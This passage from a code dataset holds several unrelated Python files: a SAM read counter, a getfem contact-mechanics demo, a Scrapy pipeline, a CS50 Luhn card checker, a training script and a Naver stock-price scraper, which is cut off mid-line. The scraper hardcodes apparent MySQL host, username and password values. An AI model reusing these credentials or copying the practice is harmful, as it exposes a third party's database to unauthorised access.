attributes.index(dict_key_attribute)\n\t\t\t\t#print(attributes)\n\t\t\telse:\n\t\t\t\t# Add data to dict\n\t\t\t\tdict_key = row[dict_key_index]\n\t\t\t\toutput[dict_key] = {}\n\t\t\t\tfor i,value in enumerate(row):\n\t\t\t\t\tattribute = attributes[i]\n\t\t\t\t\toutput[dict_key][attribute] = value\n\treturn output","repo_name":"TobiasSolbeckar/nhl","sub_path":"nhl_helpers.py","file_name":"nhl_helpers.py","file_ext":"py","file_size_in_byte":37367,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"18261015131","text":"\n# Here is the pseudocode:\n\n# 1. For each line of the file, read the line with a CSV reader and do the following\n# \t1. if the line starts with @\n# \t\t1. if the value of the first column is @HD\n# \t\t\t1. discard it\n# \t\t2. if the value of the first column is @SQ\n# \t\t\t1. get the value of the second column in the line\n# \t\t\t2. strip the \"SN:\" from the start of the value\n# \t\t\t3. store the remainder of the value as a key in a dictionary with a value of 0\n# \t\t3. if the value of the first column is @PG\n# \t\t\t1. discard it\n# \t2. else (we have an alignment information line)\n# \t\t1. Place the value from column 3 from the line we read into a variable called seq_name\n# \t\t2. 
Place the value from column 8 from the line we read into a variable called mate_pos\n# \t\t3. If (seq_name does not contain '*' AND does not contain '0') AND (mate_pos is between 1 and 81,000)\n# \t\t\t1. Increment (by 1) the value of the dictionary entry whose key matches seq_name\n# 2. Print out the contents of the dictionary (by key and value) for any key that contains the string \"Zea\" to list the reference sequences and their number of reads with a position between 1 and 81,000\n\nimport csv\nimport sys\nimport re\n\nfilename = sys.argv[1]\n\nref_seq_dict = {}\n\nwith open (filename) as file:\n\treader = csv.reader(file, delimiter='\\t')\n\n\tfor line in reader:\n\t\tif line[0] == \"@HD\" :\n\t\t\tcontinue\n\n\t\tif line[0] == \"@PG\" :\n\t\t\tcontinue\n\n\t\tif line[0] == \"@SQ\" :\n\t\t\tsequence = line[1]\n\t\t\tsequence = sequence.strip() # strip() returns a new string, so the result must be reassigned\n\t\t\tsequence = re.sub(r\"^[S][N][:]\", \"\", sequence)\n\t\t\tref_seq_dict[sequence]=0\n\n\t\telse:\n\t\t\tseq_name = line[2]\n\t\t\tmate_pos = line[7]\n\t\t\tif ((seq_name != '*' and seq_name != '0') and (1 <= int(mate_pos) <= 81000)):\n\t\t\t\tref_seq_dict[seq_name] += 1 \n\nfor seq in ref_seq_dict:\n\tif (seq.lower().find('zea') >= 0) :\n\t\tprint (seq,':',ref_seq_dict[seq])\n","repo_name":"RonRussell/bioinformatics","sub_path":"bat-5/bat5-5.py","file_name":"bat5-5.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44286686976","text":"import numpy as np\n\nimport getfem as gf\n\ngf.util_trace_level(1)\n\ntest_case = 1 # 0 = 2D punch on a rigid obstacle\n              # 1 = 2D punch on a deformable obstacle (one slave, one master)\n              # 2 = 2D with two different meshes\n              # 3 = 2D with multi-body and only one mesh\n              # 4 = 3D case (sphere / parallelepiped) (two meshes)\n\nclambda1 = 1. # Elasticity parameters\ncmu1 = 1.\nclambda2 = 1. # Elasticity parameters\ncmu2 = 1.\nr = 0.1 # Augmentation parameter\nalpha = 1. # Alpha coefficient for \"sliding velocity\"\nf_coeff = 0. 
# Friction coefficient\n\ntest_tangent_matrix = False\nnonlinear_elasticity = False\nmax_iter = 50\n\nif test_case in [0,1]:\n vf = 0.\n vf_mult = 1.\n penalty_parameter = 0.\n dirichlet_translation = -0.5\n max_res = 1e-8\n release_dist = 1.5\n self_contact = False\n load_steps = 40\nelif test_case == 3:\n vf = 0.01 # Vertical force\n vf_mult = 1.01\n penalty_parameter = 0.1\n release_dist = 0.05\n max_res = 1e-9\n self_contact = True\n load_steps = 250\nelif test_case in [2,4]:\n vf = 0.01\n vf_mult = 1.5\n penalty_parameter = 0.01\n max_res = 1e-8\n if test_case == 2:\n release_dist = 0.1\n else:\n release_dist = 5.\n self_contact = True\n load_steps = 10000\n\nif test_case == 0:\n #mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/punch2D_1.mesh\")\n mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/punch2D_2.mesh\")\nelif test_case == 1:\n #mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/punch2D_1.mesh\")\n mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/punch2D_2.mesh\")\n mesh2 = gf.Mesh(\"import\", \"structured\", \"GT='GT_PK(2,1)';ORG=[-14,-5];SIZES=[28,5];NSUBDIV=[28,5]\")\nelif test_case == 2:\n mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/disc_with_a_hole.mesh\")\n #mesh1 = gf.Mesh(\"import\", \"structured\", \"GT='GT_PK(2,1)';ORG=[-0.5,0.1];SIZES=[1,0.1];NSUBDIV=[20,2]\")\n mesh2 = gf.Mesh(\"import\", \"structured\", \"GT='GT_PK(2,1)';ORG=[-0.5,0];SIZES=[1,0.1];NSUBDIV=[20,2]\")\nelif test_case == 3:\n mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/multi_body.mesh\")\nelif test_case == 4:\n mesh1 = gf.Mesh(\"load\", \"../../../tests/meshes/sphere_with_quadratic_tetra_400_elts.mesh\")\n mesh2 = gf.Mesh(\"import\", \"structured\", \"GT='GT_PK(3,1)';ORG=[-15,-15,-4];SIZES=[30,30,4];NSUBDIV=[10,10,2]\")\ntwo_meshes = \"mesh2\" in locals()\n\nN = mesh1.dim()\n\nmfu1 = gf.MeshFem(mesh1, N)\nmfu1.set_classical_fem(2)\n\npre_mflambda1 = gf.MeshFem(mesh1, N)\npre_mflambda1.set_classical_fem(1)\n\nmfvm1 = gf.MeshFem(mesh1)\nmfvm1.set_classical_discontinuous_fem(1)\n\nCONTACT_BOUNDARY1 = 1\nDIRICHLET_BOUNDARY1 = 3\nborder = mesh1.outer_faces()\nif test_case >= 2:\n mesh1.set_region(CONTACT_BOUNDARY1, border)\nelse:\n normals = mesh1.normal_of_faces(border)\n contact_boundary = border[:,np.nonzero(normals[N-1] < -0.01)[0]]\n mesh1.set_region(CONTACT_BOUNDARY1, contact_boundary)\n P = mesh1.pts() # get list of mesh points coordinates\n ctop = (P[N-1,:] > 39.999) # find those on top of the object\n pidtop = np.compress(ctop, list(range(0, mesh1.nbpts())))\n ftop = mesh1.faces_from_pid(pidtop)\n mesh1.set_region(DIRICHLET_BOUNDARY1, ftop)\n\n# dol1 = pre_mflambda1.basic_dof_on_region(CONTACT_BOUNDARY1)\n# mflambda1 = gf.MeshFem(\"partial\", pre_mflambda1, dol1)\n\nmim1 = gf.MeshIm(mesh1, 4)\nmim1_contact = gf.MeshIm(mesh1, 4)\n\nif test_case not in [0,3]:\n mfu2 = gf.MeshFem(mesh2, N)\n mfu2.set_classical_fem(2)\n\n pre_mflambda2 = gf.MeshFem(mesh2, N)\n pre_mflambda2.set_classical_fem(1)\n\n mfvm2 = gf.MeshFem(mesh2)\n mfvm2.set_classical_discontinuous_fem(1)\n\n CONTACT_BOUNDARY2 = 2\n border = mesh2.outer_faces()\n if test_case != 1:\n mesh2.set_region(CONTACT_BOUNDARY2, border)\n else:\n normals = mesh2.normal_of_faces(border)\n contact_boundary = border[:,np.nonzero(normals[N-1] > 0.01)[0]]\n mesh2.set_region(CONTACT_BOUNDARY2, contact_boundary)\n dirichlet_boundary = border[:,np.nonzero(normals[N-1] < -0.01)[0]]\n DIRICHLET_BOUNDARY2 = 5\n mesh2.set_region(DIRICHLET_BOUNDARY2, dirichlet_boundary)\n\n mim2 = gf.MeshIm(mesh2, 4)\n mim2_contact = gf.MeshIm(mesh2, 4)\n\nmd = 
gf.Model(\"real\")\n\nF = np.zeros(N)\nF[N-1] = -vf\n\nw1_str = \"\"\nw2_str = \"\"\n\nmd.add_fem_variable(\"u1\", mfu1)\nif f_coeff > 1e-10:\n md.add_fem_data(\"w1\", mfu1)\n w1_str = \"w1\"\nmd.add_filtered_fem_variable(\"lambda1\", pre_mflambda1, CONTACT_BOUNDARY1)\n\nif nonlinear_elasticity:\n lawname = \"Ciarlet Geymonat\"\n params1 = [clambda1, cmu1, cmu1/2-clambda1/8]\n md.add_initialized_data(\"params1\", params1)\n md.add_nonlinear_elasticity_brick(mim1, \"u1\", lawname, \"params1\")\nelse:\n md.add_initialized_data(\"clambda1\", clambda1)\n md.add_initialized_data(\"cmu1\", cmu1)\n md.add_isotropic_linearized_elasticity_brick(mim1, \"u1\", \"clambda1\", \"cmu1\")\n\nif test_case == 2:\n# md.add_initialized_data(\"cpoints1\", [0 0.5 0 1.5 0 0.5 0 1.5])\n# md.add_initialized_data(\"cunitv1\", [1 0 1 0 0 1 0 1])\n# md.add_initialized_data(\"cdata\", [0 0 -0.01 -0.01])\n# md.add_pointwise_constraints_with_multipliers(\"u1\", \"cpoints1\", \"cunitv1\", \"cdata\")\n md.add_initialized_data(\"cpoints1\", [0,0.5,0,1.5])\n md.add_initialized_data(\"cunitv1\", [1,0,1,0])\n md.add_initialized_data(\"cdata\", [0,0])\n md.add_pointwise_constraints_with_multipliers(\"u1\", \"cpoints1\", \"cunitv1\", \"cdata\")\n\nmd.add_initialized_data(\"penalty_param1\", [penalty_parameter])\nmd.add_mass_brick(mim1, \"u1\", \"penalty_param1\")\nmd.add_initialized_data(\"data1\", F)\nmd.add_source_term_brick(mim1, \"u1\", \"data1\")\n\nif test_case not in [0,3]:\n md.add_fem_variable(\"u2\", mfu2)\n if f_coeff > 1e-10:\n md.add_fem_data(\"w2\", mfu2)\n w2_str = \"w2\"\n if self_contact:\n md.add_filtered_fem_variable(\"lambda2\", pre_mflambda2, CONTACT_BOUNDARY2)\n\n if nonlinear_elasticity:\n lawname = \"Ciarlet Geymonat\"\n params2 = [clambda2, cmu2, cmu2/2-clambda2/8]\n md.add_initialized_data(\"params2\", params2)\n md.add_nonlinear_elasticity_brick(mim2, \"u2\", lawname, \"params2\")\n else:\n md.add_initialized_data(\"clambda2\", clambda2)\n md.add_initialized_data(\"cmu2\", cmu2)\n\n md.add_isotropic_linearized_elasticity_brick(mim2, \"u2\", \"clambda2\", \"cmu2\")\n\n if test_case == 2:\n md.add_initialized_data(\"cpoints2\", [0,0])\n md.add_initialized_data(\"cunitv2\", [1,0])\n md.add_pointwise_constraints_with_multipliers(\"u2\", \"cpoints2\", \"cunitv2\")\n\n md.add_initialized_data(\"penalty_param2\", [penalty_parameter])\n md.add_mass_brick(mim2, \"u2\", \"penalty_param2\")\n md.add_initialized_data(\"data2\", F)\n md.add_source_term_brick(mim2, \"u2\", \"data2\")\n\n if test_case == 1:\n Ddata = np.zeros(N)\n md.add_initialized_data(\"Ddata2\", Ddata)\n md.add_Dirichlet_condition_with_multipliers(mim2, \"u2\", 1, DIRICHLET_BOUNDARY2, \"Ddata2\")\n\nif test_case <= 1:\n Ddata = np.zeros(N)\n Ddata[N-1] = dirichlet_translation\n md.add_initialized_data(\"Ddata1\", Ddata)\n md.add_Dirichlet_condition_with_multipliers(mim1, \"u1\", 1, DIRICHLET_BOUNDARY1, \"Ddata1\")\n\nmd.add_initialized_data(\"r\", r)\nmd.add_initialized_data(\"alpha\", alpha)\nmd.add_initialized_data(\"f\", f_coeff)\n\ndirect_generic_assembly = False\nif direct_generic_assembly: # Direct use of high-level generic assembly\n # TODO: account for w1, w2 when f_coeff > 0\n md.add_raytracing_transformation(\"contact_trans\", release_dist)\n if two_meshes: # The definition of a variable group is not mandatory. 
Just for test.\n md.define_variable_group(\"u\", \"u1\", \"u2\")\n else:\n md.define_variable_group(\"u\", \"u1\")\n\n if self_contact:\n md.add_master_contact_boundary_to_raytracing_transformation(\"contact_trans\", mesh1, \"u\", CONTACT_BOUNDARY1)\n else:\n md.add_slave_contact_boundary_to_raytracing_transformation(\"contact_trans\", mesh1, \"u\", CONTACT_BOUNDARY1)\n\n if test_case == 0:\n md.add_rigid_obstacle_to_raytracing_transformation(\"contact_trans\", \"80-sqrt(sqr(x)+sqr(y-80))\", N)\n elif test_case == 1:\n md.add_master_contact_boundary_to_raytracing_transformation(\"contact_trans\", mesh2, \"u\", CONTACT_BOUNDARY2)\n elif test_case == 2:\n md.add_master_contact_boundary_to_raytracing_transformation(\"contact_trans\", mesh2, \"u\", CONTACT_BOUNDARY2)\n md.add_rigid_obstacle_to_raytracing_transformation(\"contact_trans\", \"y+1\", N)\n elif test_case == 3:\n md.add_rigid_obstacle_to_raytracing_transformation(\"contact_trans\", \"2-sqrt(sqr(x)+sqr(y-1))\", N)\n elif test_case == 4:\n md.add_master_contact_boundary_to_raytracing_transformation(\"contact_trans\", mesh2, \"u\", CONTACT_BOUNDARY2)\n md.add_rigid_obstacle_to_raytracing_transformation(\"contact_trans\", \"z+5\", N)\n\n md.add_nonlinear_term(mim1_contact, \"-lambda1.Test_u1\", CONTACT_BOUNDARY1) \n md.add_nonlinear_term(mim1_contact, \"Interpolate_filter(contact_trans, lambda1.Interpolate(Test_u,contact_trans), 1)\", CONTACT_BOUNDARY1) \n md.add_nonlinear_term(mim1_contact, \"-(1/r)*lambda1.Test_lambda1\", CONTACT_BOUNDARY1)\n md.add_nonlinear_term(mim1_contact, \"Interpolate_filter(contact_trans, (1/r)*Coulomb_friction_coupled_projection(lambda1, Transformed_unit_vector(Grad_u1, Normal), u1, (Interpolate(X,contact_trans)-X-u1).Transformed_unit_vector(Grad_u1, Normal), f, r).Test_lambda1, 2)\", CONTACT_BOUNDARY1)\n md.add_nonlinear_term(mim1_contact, \"Interpolate_filter(contact_trans, (1/r)*Coulomb_friction_coupled_projection(lambda1, Transformed_unit_vector(Grad_u1, Normal), u1-Interpolate(u,contact_trans), (Interpolate(X,contact_trans)+Interpolate(u,contact_trans)-X-u1).Transformed_unit_vector(Grad_u1, Normal), f, r).Test_lambda1, 1)\", CONTACT_BOUNDARY1)\n \n if two_meshes and self_contact:\n md.add_nonlinear_term(mim2_contact, \"-lambda2.Test_u2\", CONTACT_BOUNDARY2) \n md.add_nonlinear_term(mim2_contact, \"Interpolate_filter(contact_trans, lambda2.Interpolate(Test_u,contact_trans), 1)\", CONTACT_BOUNDARY2) \n md.add_nonlinear_term(mim2_contact, \"-(1/r)*lambda2.Test_lambda2\", CONTACT_BOUNDARY2)\n md.add_nonlinear_term(mim2_contact, \"Interpolate_filter(contact_trans, (1/r)*Coulomb_friction_coupled_projection(lambda2, Transformed_unit_vector(Grad_u2, Normal), u2, (Interpolate(X,contact_trans)-X-u2).Transformed_unit_vector(Grad_u2, Normal), f, r).Test_lambda2, 2)\", CONTACT_BOUNDARY2)\n md.add_nonlinear_term(mim2_contact, \"Interpolate_filter(contact_trans, (1/r)*Coulomb_friction_coupled_projection(lambda2, Transformed_unit_vector(Grad_u2, Normal), u2-Interpolate(u,contact_trans), (Interpolate(X,contact_trans)+Interpolate(u,contact_trans)-X-u2).Transformed_unit_vector(Grad_u2, Normal), f, r).Test_lambda2, 1)\", CONTACT_BOUNDARY2) \n\n u_group = \"u\"\n contact_trans = \"contact_trans\"\nelse: # Use of the new contact brick which uses the high-level generic assembly\n\n ind = md.add_integral_large_sliding_contact_brick_raytracing(\"r\", release_dist, \"f\", \"alpha\", 0)\n\n if self_contact:\n md.add_master_slave_contact_boundary_to_large_sliding_contact_brick(ind, mim1_contact, CONTACT_BOUNDARY1, \"u1\", 
\"lambda1\", w1_str)\n else:\n md.add_slave_contact_boundary_to_large_sliding_contact_brick(ind, mim1_contact, CONTACT_BOUNDARY1, \"u1\", \"lambda1\", w1_str)\n\n if test_case == 0:\n md.add_rigid_obstacle_to_large_sliding_contact_brick(ind, \"80-sqrt(sqr(x)+sqr(y-80))\", N)\n elif test_case == 1:\n md.add_master_contact_boundary_to_large_sliding_contact_brick(ind, mim2_contact, CONTACT_BOUNDARY2, \"u2\", w2_str)\n elif test_case == 2:\n md.add_master_slave_contact_boundary_to_large_sliding_contact_brick(ind, mim2_contact, CONTACT_BOUNDARY2, \"u2\", \"lambda2\", w2_str)\n md.add_rigid_obstacle_to_large_sliding_contact_brick(ind, \"y+1\", N)\n elif test_case == 3:\n md.add_rigid_obstacle_to_large_sliding_contact_brick(ind, \"2-sqrt(sqr(x)+sqr(y-1))\", N)\n elif test_case == 4:\n md.add_master_slave_contact_boundary_to_large_sliding_contact_brick(ind, mim2_contact, CONTACT_BOUNDARY2, \"u2\", \"lambda2\", w2_str)\n md.add_rigid_obstacle_to_large_sliding_contact_brick(ind, \"z+5\", N)\n\n u_group = md.displacement_group_name_of_large_sliding_contact_brick(ind)\n contact_trans = md.transformation_name_of_large_sliding_contact_brick(ind)\n\n\nfor nit in range(load_steps):\n\n if test_tangent_matrix:\n errmax = md.test_tangent_matrix(1E-8, 20, 0.0001)\n #errmax = md.test_tangent_matrix_term(\"lambda1\", \"u1\", 1E-8, 20, 0.0001)\n print(\"errmax = %g\" % errmax)\n if errmax > 1e-3:\n print(\"bad tangent matrix\")\n\n if w1_str:\n md.set_variable(w1_str, md.variable(\"u1\"))\n if w2_str:\n md.set_variable(w2_str, md.variable(\"u2\"))\n\n print(\"SOLVING LOAD STEP %i\" % nit)\n md.solve(\"noisy\", \"max_iter\", max_iter, \"max_res\", max_res) # , \"lsearch\", \"simplest\")\n\n U1 = md.variable(\"u1\")\n if nonlinear_elasticity:\n VM1 = md.compute_Von_Mises_or_Tresca(\"u1\", lawname, \"params1\", mfvm1)\n else:\n VM1 = md.compute_isotropic_linearized_Von_Mises_or_Tresca(\"u1\", \"clambda1\", \"cmu1\", mfvm1)\n mfvm1.export_to_vtk(\"lsc_1_%i.vtk\" % nit, mfvm1, VM1,\n \"Von Mises Stresses 1\", mfu1, U1, \"Displacements 1\")\n\n lambda1 = md.variable(\"lambda1\")\n mf_lambda1 = md.mesh_fem_of_variable(\"lambda1\")\n sl = gf.Slice((\"boundary\",), mf_lambda1, CONTACT_BOUNDARY1)\n sl.export_to_vtk(\"lsc_1_boundary_%i.vtk\" % nit,\n mfu1, U1, \"BDisplacements 1\",\n mf_lambda1, lambda1, \"BMultiplier 1\")\n\n if test_case not in [0,3]:\n U2 = md.variable(\"u2\")\n if nonlinear_elasticity:\n VM2 = md.compute_Von_Mises_or_Tresca(\"u2\", lawname, \"params2\", mfvm2)\n else:\n VM2 = md.compute_isotropic_linearized_Von_Mises_or_Tresca(\"u2\", \"clambda2\", \"cmu2\", mfvm2)\n mfvm2.export_to_vtk(\"lsc_2_%i.vtk\" % nit, mfvm2, VM2,\n \"Von Mises Stresses 2\", mfu2, U2, \"Displacements 2\")\n\n sl = gf.Slice((\"boundary\",), mfu2, CONTACT_BOUNDARY2)\n sl.export_to_vtk(\"lsc_2_boundary_%i.vtk\" % nit,\n mfu2, U2, \"BDisplacements 2\")\n\n vf *= vf_mult\n F[N-1] = -vf\n md.set_variable(\"data1\", F)\n if test_case not in [0,3]:\n md.set_variable(\"data2\", F)\n\n if test_case <= 1:\n Ddata[N-1] -= 1.\n md.set_variable(\"Ddata1\", Ddata)\n","repo_name":"getfem-doc/getfem","sub_path":"interface/tests/python/demo_large_sliding_contact.py","file_name":"demo_large_sliding_contact.py","file_ext":"py","file_size_in_byte":14049,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"48"} +{"seq_id":"25724078359","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: 
https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nfrom main.models import Country, City\n\n\nclass CrawlerPipeline(object):\n def process_item(self, data_set, spider):\n print(\"\\n\\n------- pipline-------\")\n\n if spider.name == \"country\":\n return self.handle_country(data_set)\n\n elif data_set[\"db_table\"] == \"Country\":\n return self.handle_country(data_set)\n\n elif data_set[\"db_table\"] == \"City\":\n return self.handle_city(data_set)\n\n def handle_country(self, data_set):\n print(\"-------handle_country-------\")\n\n item = Country()\n item.name = data_set[\"name\"]\n item.currency = data_set[\"currency\"]\n item.save()\n\n def handle_city(self, data_set):\n print(\"-------handle_city-------\")\n\n item = City()\n item.name = data_set[\"name\"]\n country_name = data_set[\"country_name\"]\n country = Country.objects.filter(name=country_name).last()\n item.country = country\n item.save()\n","repo_name":"mahdimohebbian/Numbeo","sub_path":"crawler/crawler/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24549750856","text":"from cs50 import get_string\n\n# Gets number of card\ncard = get_string(\"Number: \")\nsize = len(card)\nsum = 0\n\n# Calculates Luhn's Algorithm\nfor i in range(size - 2, -1, -2):\n if (int(card[i]) * 2 > 9):\n sum += (int(card[i]) * 2) % 10\n sum += 1\n else:\n sum += int(card[i]) * 2\nfor i in range(size - 1, -1, -2):\n sum += int(card[i])\n\n# Checks if the card is valid and which card it is\nif (sum % 10 == 0):\n if (size == 15 and (card[:2] == \"34\" or card[:2] == \"37\")):\n print(\"AMEX\")\n elif (size == 16 and (card[:2] == \"51\" or card[:2] == \"52\" or card[:2] == \"53\" or card[:2] == \"54\" or card[:2] == \"55\")):\n print(\"MASTERCARD\")\n elif ((size == 13 or size == 16) and card[0] == \"4\"):\n print(\"VISA\")\n else:\n print(\"INVALID\")\nelse:\n print(\"INVALID\")\n\n\n\n","repo_name":"vicentecrespop/CS50ProblemSets","sub_path":"sentimental-credit/credit.py","file_name":"credit.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8828339147","text":"import argparse\nimport json\nfrom src.configs import TrainConfig, DataConfig, ModelConfig\nfrom src.utils import train, initialize_train\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=str, default='./configs/default_config.json')\n\n args = parser.parse_args()\n\n with open(args.config) as config_file:\n configs = json.load(config_file)\n \n train_config = TrainConfig(**configs['train'])\n data_config = DataConfig(**configs['data'])\n model_config = ModelConfig(**configs['model'])\n\n train_params = initialize_train(train_config,data_config,model_config)\n train(**train_params)\n","repo_name":"nickdn2/CatDiffusion","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7391359976","text":"import pymysql.cursors\r\nimport urllib.request\r\nimport urllib.parse\r\nimport bs4\r\n\r\n\r\nconn = pymysql.connect(host='222.122.86.187', port=3306, user='geniuses777', password='stock7840', db='geniuses777',\r\n charset='utf8')\r\n\r\n# CJ\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=001040\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml 
= urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nCJ_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nCJ_data_first = CJ_data.find(\"span\", {\"class\": \"blind\"})\r\nCJ_data_realTime = CJ_data_first.text # 실시간 가격\r\nCJ_data_realTime_result = CJ_data_realTime.replace(\",\",\"\")\r\nCJ_data_realTime_int = int(CJ_data_realTime_result)\r\nprint(CJ_data_realTime_int)\r\nprint(CJ_data_realTime)\r\n\r\n# LG\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=003550\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nLG_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nLG_data_first = LG_data.find(\"span\", {\"class\": \"blind\"})\r\nLG_data_realTime = LG_data_first.text # 실시간 가격\r\nLG_data_realTime_result = LG_data_realTime.replace(\",\",\"\")\r\nLG_data_realTime_int = int(LG_data_realTime_result)\r\nprint(LG_data_realTime_int)\r\nprint(LG_data_realTime)\r\n\r\n# SK\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=034730\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nSK_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nSK_data_first = SK_data.find(\"span\", {\"class\": \"blind\"})\r\nSK_data_realTime = SK_data_first.text # 실시간 가격\r\nSK_data_realTime_result = SK_data_realTime.replace(\",\",\"\")\r\nSK_data_realTime_int = int(SK_data_realTime_result)\r\nprint(SK_data_realTime_int)\r\nprint(SK_data_realTime)\r\n\r\n# DOOSAN\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=000150\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nDOOSAN_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nDOOSAN_data_first = DOOSAN_data.find(\"span\", {\"class\": \"blind\"})\r\nDOOSAN_data_realTime = DOOSAN_data_first.text # 실시간 가격\r\nDOOSAN_data_realTime_result = DOOSAN_data_realTime.replace(\",\",\"\")\r\nDOOSAN_data_realTime_int = int(DOOSAN_data_realTime_result)\r\nprint(DOOSAN_data_realTime_int)\r\nprint(DOOSAN_data_realTime)\r\n\r\n# SAMSUNG\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=005930\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nsamsung_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nsamsung_data_first = samsung_data.find(\"span\", {\"class\": \"blind\"})\r\nsamsung_data_realTime = samsung_data_first.text # 실시간 가격\r\nsamsung_data_realTime_result = samsung_data_realTime.replace(\",\",\"\")\r\nsamsung_data_realTime_int = int(samsung_data_realTime_result)\r\nprint(samsung_data_realTime_int)\r\nprint(samsung_data_realTime)\r\n\r\n# ASIANA\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=020560\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nASIANA_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nASIANA_data_first = ASIANA_data.find(\"span\", {\"class\": \"blind\"})\r\nASIANA_data_realTime = ASIANA_data_first.text # 실시간 가격\r\nASIANA_data_realTime_result = ASIANA_data_realTime.replace(\",\",\"\")\r\nASIANA_data_realTime_int = int(ASIANA_data_realTime_result)\r\nprint(ASIANA_data_realTime_int)\r\nprint(ASIANA_data_realTime)\r\n\r\n# KAKAO\r\nurl_naver = 
\"https://finance.naver.com/item/main.nhn?code=035720\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nKAKAO_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nKAKAO_data_first = KAKAO_data.find(\"span\", {\"class\": \"blind\"})\r\nKAKAO_data_realTime = KAKAO_data_first.text # 실시간 가격\r\nKAKAO_data_realTime_result = KAKAO_data_realTime.replace(\",\",\"\")\r\nKAKAO_data_realTime_int = int(KAKAO_data_realTime_result)\r\nprint(KAKAO_data_realTime_int)\r\nprint(KAKAO_data_realTime)\r\n\r\n# JINRO\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=000080\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nJINRO_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nJINRO_data_first = JINRO_data.find(\"span\", {\"class\": \"blind\"})\r\nJINRO_data_realTime = JINRO_data_first.text # 실시간 가격\r\nJINRO_data_realTime_result = JINRO_data_realTime.replace(\",\",\"\")\r\nJINRO_data_realTime_int = int(JINRO_data_realTime_result)\r\nprint(JINRO_data_realTime_int)\r\nprint(JINRO_data_realTime)\r\n\r\n# HANWHA\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=000880\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nHANWHA_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nHANWHA_data_first = HANWHA_data.find(\"span\", {\"class\": \"blind\"})\r\nHANWHA_data_realTime = HANWHA_data_first.text # 실시간 가격\r\nHANWHA_data_realTime_result = HANWHA_data_realTime.replace(\",\",\"\")\r\nHANWHA_data_realTime_int = int(HANWHA_data_realTime_result)\r\nprint(HANWHA_data_realTime_int)\r\nprint(HANWHA_data_realTime)\r\n\r\n# HYUNDAI\r\nurl_naver = \"https://finance.naver.com/item/main.nhn?code=005380\"\r\n# url만 바꾸면 각 기업에 따른 값 크롤링 가능\r\nhtml = urllib.request.urlopen(url_naver)\r\n\r\nbs_obj = bs4.BeautifulSoup(html, \"html.parser\")\r\n\r\nHYUNDAI_data = bs_obj.find(\"div\", {\"class\": \"today\"})\r\nHYUNDAI_data_first = HYUNDAI_data.find(\"span\", {\"class\": \"blind\"})\r\nHYUNDAI_data_realTime = HYUNDAI_data_first.text # 실시간 가격\r\nHYUNDAI_data_realTime_result = 